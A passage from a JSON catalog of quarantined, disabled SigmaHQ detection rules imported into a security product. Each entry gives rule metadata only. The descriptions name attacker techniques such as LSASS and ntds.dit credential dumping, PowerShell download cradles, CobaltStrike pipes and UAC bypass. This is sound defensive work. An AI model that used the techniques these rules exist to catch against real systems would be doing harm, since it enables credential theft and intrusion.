features of Active Directory and Azure Active Directory. 
These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dsinternals-suspicious-powershell-cmdlets-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "846c7a87-8e14-4569-9d49-ecfd4276a01c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_dsinternals_cmdlets.yml" } }, { "id": "sigmahq-sigma-847d5ff3-8a31-4737-a970-aeae8fe21765", "type": "detection", "name": "Potential Tampering With Security Products Via WMIC", "description": "Detects uninstallation or termination of security products using the WMIC utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-tampering-with-security-products-via-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "847d5ff3-8a31-4737-a970-aeae8fe21765", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml" } }, { "id": "sigmahq-sigma-847def9e-924d-4e90-b7c4-5f581395a2b4", "type": "detection", "name": "HackTool - QuarksPwDump Dump File", "description": "Detects a dump file written by QuarksPwDump password dumper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-quarkspwdump-dump-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_quarkspw_filedump.yml" } }, { "id": "sigmahq-sigma-84972c80-251c-4c3a-9079-4f00aad93938", "type": "detection", "name": "Sensitive File Recovery From Backup Via Wbadmin.EXE", "description": "Detects the dump of highly sensitive files such as \"NTDS.DIT\" and \"SECURITY\" hive.\nAttackers can leverage the \"wbadmin\" utility in order to dump sensitive files that might contain credential or sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sensitive-file-recovery-from-backup-via-wbadmin-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "84972c80-251c-4c3a-9079-4f00aad93938", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml" } }, { "id": "sigmahq-sigma-84b0a8f3-680b-4096-a45b-e9a89221727c", "type": "detection", "name": "PCRE.NET Package Image Load", "description": "Detects processes loading modules related to PCRE.NET package", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pcre-net-package-image-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84b0a8f3-680b-4096-a45b-e9a89221727c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_pcre_dotnet_dll_load.yml" } }, { "id": "sigmahq-sigma-84b14121-9d14-416e-800b-f3b829c5a14d", "type": "detection", "name": "Suspicious CustomShellHost Execution", "description": "Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\\Windows\\explorer.exe'. 
CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-customshellhost-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84b14121-9d14-416e-800b-f3b829c5a14d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_customshellhost_susp_exec.yml" } }, { "id": "sigmahq-sigma-84b1706c-932a-44c4-ae28-892b28a25b94", "type": "detection", "name": "OneNote.EXE Execution of Malicious Embedded Scripts", "description": "Detects the execution of malicious OneNote documents that contain embedded scripts.\nWhen a user clicks on a OneNote attachment and then on the malicious link inside the \".one\" file, it exports and executes the malicious embedded script from specific directories.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/onenote-exe-execution-of-malicious-embedded-scripts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84b1706c-932a-44c4-ae28-892b28a25b94", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_onenote_embedded_script_execution.yml" } }, { "id": "sigmahq-sigma-84b1ecf9-6eff-4004-bafb-bae5c0e251b2", "type": "detection", "name": "Potentially Suspicious GoogleUpdate Child Process", "description": "Detects potentially suspicious child processes of \"GoogleUpdate.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-googleupdate-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84b1ecf9-6eff-4004-bafb-bae5c0e251b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_googleupdate_susp_child_process.yml" } }, { "id": "sigmahq-sigma-84b777bd-c946-4d17-aa2e-c39f5a454325", "type": "detection", "name": "RBAC Permission Enumeration Attempt", "description": "Detects identities attempting to enumerate their Kubernetes RBAC permissions.\nIn the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment.\nIn a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. 
a \"kubectl auth can-i --list\" command.\nThis will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.003", "T1087.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rbac-permission-enumeration-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84b777bd-c946-4d17-aa2e-c39f5a454325", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing.yml" } }, { "id": "sigmahq-sigma-84bae5d4-b518-4ae0-b331-6d4afd34d00f", "type": "detection", "name": "MacOS Network Service Scanning", "description": "Detects enumeration of local or remote network services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/macos-network-service-scanning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84bae5d4-b518-4ae0-b331-6d4afd34d00f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml" } }, { 
"id": "sigmahq-sigma-84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "type": "detection", "name": "PowerShell Get-Process LSASS in ScriptBlock", "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-get-process-lsass-in-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" } }, { "id": "sigmahq-sigma-84c9e83c-599a-458a-a0cb-0ecce44e807a", "type": "detection", "name": "Ufw Force Stop Using Ufw-Init", "description": "Detects attempts to force stop the ufw using ufw-init", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ufw-force-stop-using-ufw-init.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84c9e83c-599a-458a-a0cb-0ecce44e807a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml" } }, { "id": "sigmahq-sigma-84f52741-8834-4a8c-a413-2eb2269aa6c8", "type": "detection", "name": "DllUnregisterServer Function Call Via Msiexec.EXE", "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dllunregisterserver-function-call-via-msiexec-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" } }, { "id": "sigmahq-sigma-850d55f9-6eeb-4492-ad69-a72338f65ba4", "type": "detection", "name": "C# IL Code Compilation Via Ilasm.EXE", "description": "Detects the use of \"Ilasm.EXE\" in order to compile C# intermediate (IL) code to EXE or DLL.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/c-il-code-compilation-via-ilasm-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ilasm_il_code_compilation.yml" } }, { "id": "sigmahq-sigma-8518ed3d-f7c9-4601-a26c-f361a4256a0c", "type": "detection", "name": "Suspicious Download From File-Sharing Website Via Bitsadmin", "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197", "T1036.003", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-download-from-file-sharing-website-via-bitsadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-851c506b-6b7c-4ce2-8802-c703009d03c0", "type": "detection", "name": "Winlogon Helper DLL", "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. 
Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winlogon-helper-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "851c506b-6b7c-4ce2-8802-c703009d03c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml" } }, { "id": "sigmahq-sigma-851fd622-b675-4d26-b803-14bc7baa517a", "type": "detection", "name": "HackTool - WinPwn Execution - ScriptBlock", "description": "Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. 
A tool for Windows and Active Directory reconnaissance and exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046", "T1082", "T1106", "T1518", "T1548.002", "T1552.001", "T1555", "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-winpwn-execution-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "851fd622-b675-4d26-b803-14bc7baa517a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_hktl_winpwn.yml" } }, { "id": "sigmahq-sigma-85254a62-22be-4239-b79c-2ec17e566c37", "type": "detection", "name": "F5 BIG-IP iControl Rest API Command Execution - Webserver", "description": "Detects POST requests to the F5 BIG-IP iControl Rest API \"bash\" endpoint, which allows the execution of commands on the BIG-IP", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/f5-big-ip-icontrol-rest-api-command-execution-webserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85254a62-22be-4239-b79c-2ec17e566c37", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/web/webserver_generic/web_f5_tm_utility_bash_api_request.yml" } }, { "id": "sigmahq-sigma-8537c866-072e-460d-bfff-aaf39cbd73d3", "type": "detection", "name": "Potentially Suspicious Inline JavaScript Execution via NodeJS Binary", "description": "Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-inline-javascript-execution-via-nodejs-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8537c866-072e-460d-bfff-aaf39cbd73d3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_inline_node_js_execution.yml" } }, { "id": "sigmahq-sigma-853e74f9-9392-4935-ad3b-2e8c040dae86", "type": "detection", "name": "UAC Bypass Using DismHost", "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-dismhost.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"853e74f9-9392-4935-ad3b-2e8c040dae86", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" } }, { "id": "sigmahq-sigma-855bc8b5-2ae8-402e-a9ed-b889e6df1900", "type": "detection", "name": "Copy From Or To Admin Share Or Sysvol Folder", "description": "Detects a copy command or a copy utility execution to or from an Admin share or remote", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1039", "T1048", "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/copy-from-or-to-admin-share-or-sysvol-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" } }, { "id": "sigmahq-sigma-857c8db3-c89b-42fb-882b-f681c7cf4da2", "type": "detection", "name": "Unsigned Image Loaded Into LSASS Process", "description": "Loading unsigned image (DLL, EXE) into LSASS process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-image-loaded-into-lsass-process.yaml", "quarantine_reason": "imported rule; upstream 
query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_lsass_unsigned_image_load.yml" } }, { "id": "sigmahq-sigma-85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", "type": "detection", "name": "Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet", "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/folder-compress-to-potentially-suspicious-output-via-compress-archive-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_zip_compress.yml" } }, { "id": "sigmahq-sigma-85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "type": "detection", "name": "CobaltStrike Named Pipe Patterns", 
"description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cobaltstrike-named-pipe-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml" } }, { "id": "sigmahq-sigma-85b0b087-eddf-4a2b-b033-d771fa2b9775", "type": "detection", "name": "PowerShell Download and Execution Cradles", "description": "Detects PowerShell download and execution cradles.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-download-and-execution-cradles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml" } }, { "id": 
"sigmahq-sigma-85b88e05-dadc-430b-8a9e-53ff1cd30aae", "type": "detection", "name": "Potentially Suspicious Desktop Background Change Via Registry", "description": "Detects registry value settings that would replace the user's desktop background.\nThis is a common technique used by malware to change the desktop background to a ransom note or other image.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1491.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-desktop-background-change-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85b88e05-dadc-430b-8a9e-53ff1cd30aae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_desktop_background_change.yml" } }, { "id": "sigmahq-sigma-85c312b7-f44d-4a51-a024-d671c40b49fc", "type": "detection", "name": "Service StartupType Change Via Sc.EXE", "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-startuptype-change-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"85c312b7-f44d-4a51-a024-d671c40b49fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_disable_service.yml" } }, { "id": "sigmahq-sigma-85cce894-dd8b-4427-a958-5cc47a4dc9b9", "type": "detection", "name": "Remote Utilities Host Service Install", "description": "Detects Remote Utilities Host service installation on the target system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-utilities-host-service-install.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml" } }, { "id": "sigmahq-sigma-85d23b42-9a9d-4f8f-b3d7-d2733c1d58f5", "type": "detection", "name": "HackTool - HollowReaper Execution", "description": "Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing.\nIt replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055.012" ], "log_source": null, "playbook": null, "verified": false, "source": 
"sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-hollowreaper-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85d23b42-9a9d-4f8f-b3d7-d2733c1d58f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_hollowreaper.yml" } }, { "id": "sigmahq-sigma-85de1f22-d189-44e4-8239-dc276b45379b", "type": "detection", "name": "Curl Web Request With Potential Custom User-Agent", "description": "Detects execution of \"curl.exe\" with a potential custom \"User-Agent\". Attackers can leverage this to download or exfiltrate data via \"curl\" to a domain that only accept specific \"User-Agent\" strings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/curl-web-request-with-potential-custom-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85de1f22-d189-44e4-8239-dc276b45379b", "source_commit": 